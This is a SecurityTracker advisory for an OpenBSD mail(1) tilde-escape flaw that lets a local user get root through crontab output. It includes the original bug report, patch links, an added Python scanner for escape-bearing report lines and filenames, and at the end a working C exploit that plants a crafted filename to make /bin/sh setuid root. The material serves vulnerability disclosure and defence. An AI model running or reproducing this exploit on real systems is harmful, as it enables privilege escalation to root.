OpenBSD '/usr/bin/mail' May Let Local Users Execute Commands With Root Privileges By Specifying a Malicious Crontab Entry
SecurityTracker Alert ID: 1004024
SecurityTracker URL: http://securitytracker.com/id/1004024
CVE Reference: CVE-2002-0542
Updated: Apr 30 2004
Original Entry Date: Apr 11 2002
Impact:
Execution of arbitrary code via local system, Root access via local system
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes
Description:
A vulnerability was reported in '/usr/bin/mail' on OpenBSD. A local user who can inject text into the output of a root crontab entry (for example via a crafted filename) may be able to cause arbitrary shell commands to be executed on the system with root privileges.
It is reported that /usr/bin/mail honours a special escape sequence in the body of a message even when that body is piped to it, as it is by the root crontab entries that mail the daily, weekly and monthly reports. The escape sequence specifies a shell command to be executed, as described in the mail(1) man page:
~!command
A local user who can get a crafted filename (or other controlled text) into the output of such a cron job may be able to cause arbitrary commands to be executed with root privileges when the job runs.
Demonstration exploit code is provided in the Source Message.
The author of the report credits urbanek@openbsd.cz for discovering the vulnerability.
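The defender's view of the issue above is a data-flow problem: text that a local user controls (a filename listed by /etc/security, a line from a log) is piped into a program that treats lines beginning with "~" as commands. The following is an added example, not code from the advisory, the report or OpenBSD; it shows three checks a practitioner could run on such report text in Python: a scanner that flags the lines mail(1) would interpret as tilde escapes (distinguishing the shell-running "~!" and "~|" forms), a neutraliser that uses mail(1)'s own "~~" convention so a tilde reaches the recipient as literal text, and a filesystem walk that lists names which would start such a line once printed, including the newline-prefixed trick from the report. The sample report text, the file names and the "Setuid files added:" wording are constructed for the example; the escape characters and the "~~" convention are as documented in mail(1).

```python
"""Defender-side checks for the mail(1) tilde-escape issue (added example)."""
import os
import tempfile

# Tilde escapes in BSD mail(1) that hand control to a shell: "~!command"
# runs a command, "~|command" pipes the message through one.  Other escapes
# (e.g. "~r file") do not run a shell but still change the message.
SHELL_ESCAPES = {"!", "|"}


def scan_report_for_escapes(report_text):
    """Return [(line_no, line, runs_shell)] for every line that mail(1) with
    escape processing enabled would treat as a tilde escape.

    A line starting with "~~" is mail's own way to send a literal tilde and
    is therefore not reported."""
    findings = []
    for line_no, line in enumerate(report_text.splitlines(), start=1):
        if line.startswith("~") and not line.startswith("~~"):
            findings.append((line_no, line, line[1:2] in SHELL_ESCAPES))
    return findings


def neutralize_tilde_escapes(report_text):
    """Prefix a second "~" to lines that begin with "~" so mail(1) inserts the
    literal text instead of interpreting an escape (the "~~string" form from
    mail(1)).  Lines already starting with "~~" get a third tilde, which still
    renders as the original text."""
    out = []
    for line in report_text.splitlines(keepends=True):
        out.append("~" + line if line.startswith("~") else line)
    return "".join(out)


def find_escape_filenames(root):
    """Walk `root` and return names (relative to root) that would start a
    tilde-escape line once printed in a report: a leading "~", or an embedded
    newline followed by "~" (the trick used in the original report)."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            if name.startswith("~") or "\n~" in name:
                hits.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(hits)


# Constructed sample of the text a maintenance script might pipe into mail.
# Lines 5 and 6 together are one ls(1) entry whose file name contains a
# newline followed by "~!", so the "~!" lands at the start of a line.  Line 7
# is the "~!haha" file from the report, harmless here because the name does
# not begin a line.  Line 8 is a non-shell escape.
SAMPLE_REPORT = (
    "Checking for uids of 0:\n"
    "root 0\n"
    "\n"
    "Setuid files added:\n"
    "-rwsr-xr-x 1 milos milos 0 Apr 8 19:30 /tmp/\n"
    "~!echo escape-executed\n"
    "-rw-r--r-- 1 milos milos 0 Apr 8 19:30 /tmp/~!haha\n"
    "~r /etc/motd\n"
)


def demo_on_tempdir():
    """Plant constructed file names in a scratch directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for name in ("README", "~!haha", "report\n~!injected"):
            open(os.path.join(root, name), "w").close()
        return find_escape_filenames(root)


if __name__ == "__main__":
    for line_no, line, runs_shell in scan_report_for_escapes(SAMPLE_REPORT):
        print(f"line {line_no}: {'SHELL' if runs_shell else 'escape'}: {line!r}")
    print(neutralize_tilde_escapes(SAMPLE_REPORT))
    print(demo_on_tempdir())
```

Neutralising is a stop-gap for scripts that must keep piping untrusted text into an escape-processing mailer; the durable fix is the one the vendor shipped, namely not interpreting escapes on a non-interactive body, and the scanner is the regression check that a report no longer carries a live escape.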
Impact:
A local user who can influence what root's crontab entries pipe into mail may be able to cause arbitrary shell commands to be executed with root privileges, giving that user root level access to the system.
Solution:
The vendor has developed a patch, available at:
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24
Vendor URL: www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24
Cause:
Input validation error
Underlying OS:
UNIX (OpenBSD)
Message History:
This archive entry has one or more follow-up message(s) listed below.
Source Message Contents
Date: Thu, 11 Apr 2002 13:29:28 +0200
Subject: local root compromise in openbsd 3.0 and below
There is a local root compromise in OpenBSD 3.0-current (and below, before 8 Apr 2002).
Full problem report and exploit below. FreeBSD is not vulnerable.
----- Forwarded message from urbanek@openbsd.cz -----
From: urbanek@openbsd.cz
To: gnats@openbsd.org
Subject: user/2536: possible root compromise using /usr/bin/mail
>Number: 2536
>Category: user
>Synopsis: crontab entry allows possible arbitrary command execution
>Confidential: yes
>Severity: critical
>Priority: high
>Responsible: bugs
>State: open
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Mon Apr 8 13:30:02 MDT 2002
>Last-Modified:
>Originator: Milos Urbanek
>Organization:
>Release: all releases including CURRENT
>Environment:
System : OpenBSD 3.0
Architecture: OpenBSD.i386
Machine : i386
>Description:
program /usr/bin/mail allows a special escape sequence to
be specified in the body of an email; this escape sequence
specifies a shell command to be executed
as mentioned in mail(1):
~!command
Execute the indicated shell command, then return to the message.
Problem:
default root crontab entry looks like:
# do daily/weekly/monthly maintenance
# on monday only (techie)
30 1 * * 1 /bin/sh /etc/daily 2>&1 | tee /var/log/daily.out | mail -s "`/bin/hostname` daily output" root
30 3 * * 6 /bin/sh /etc/weekly 2>&1 | tee /var/log/weekly.out | mail -s "`/bin/hostname` weekly output" root
30 5 1 * * /bin/sh /etc/monthly 2>&1 | tee /var/log/monthly.out | mail -s "`/bin/hostname` monthly output" root
If there is something in files /etc/daily, /etc/weekly or /etc/monthly
which could enable the attacker to insert its own input,
like a malformed filename
chiba:5$ touch \~!haha
chiba:6$ ls -al *haha*
-rw-r--r-- 1 milos milos 0 Apr 8 19:30 ~!haha
or by other means like output from log files under /var/log,
the attacker can execute arbitrary command running under root
privileges which can lead to the root compromise.
>How-To-Repeat:
read the man page, and see above
[...]
----- End forwarded message -----
Patch: http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24
Exploit:
/*
 * (c) 2002 venglin@freebsd.lublin.pl
 *
 * OpenBSD 3.0 (before 08 Apr 2002)
 * /etc/security + /usr/bin/mail local root exploit
 *
 * Run the exploit and wait for /etc/daily executed from crontab.
 * /bin/sh will be suid root next day morning.
 *
 * Credit goes to urbanek@openbsd.cz for discovering the vulnerability.
 *
 */
#include <fcntl.h>
#include <unistd.h>	/* chdir(), close() */

int main(void)
{
	int fd;

	/* Create a file in /tmp whose name begins with a newline followed by the
	 * mail(1) "~!" escape.  As the forwarded report explains, when the daily
	 * run lists that name in the output piped into mail, the "~!" starts a
	 * fresh line and mail runs the rest of it as a shell command. */
	chdir("/tmp");
	fd = open("\n~!chmod +s `perl -e 'print \"\\057\\142\\151\\156\\057\\163\\150\"'`\n", O_CREAT|O_WRONLY, 04777);
	/* open() returns -1 on failure; a descriptor of 0 is valid */
	if (fd != -1)
		close(fd);
	return 0;
}
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *